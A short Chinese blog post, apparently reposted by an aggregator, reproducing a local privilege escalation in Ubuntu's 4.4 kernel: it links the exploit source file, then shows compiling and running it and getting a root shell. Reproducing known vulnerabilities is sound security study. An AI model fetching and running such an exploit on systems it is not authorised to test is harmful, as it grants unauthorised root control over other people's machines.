新版本Ubuntu本地提权漏洞复现
Posted Sch01aR#
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了新版本Ubuntu本地提权漏洞复现相关的知识,希望对你有一定的参考价值。
该漏洞在老版本中被修复了,但新的版本还存在漏洞
影响范围:Linux Kernel Version 4.14-4.4,Ubuntu/Debian发行版本
Exp下载地址:http://cyseclabs.com/exploits/upstream44.c
测试环境
sch01ar@ubuntu:~$ uname -a Linux ubuntu 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
开始测试
sch01ar@ubuntu:~$ gcc -o test upstream44.c sch01ar@ubuntu:~$ chmod -R 777 test sch01ar@ubuntu:~$ ./test task_struct = ffff8800338cd400 uidptr = ffff880007530904 spawning root shell root@ubuntu:~# whoami root
复现成功
以上是关于新版本Ubuntu本地提权漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章
[漏洞复现] CVE-2017-16995 Ubuntu16.04漏洞复现
漏洞预警 | Ubuntu 16.04版本存在本地提权漏洞(附EXP)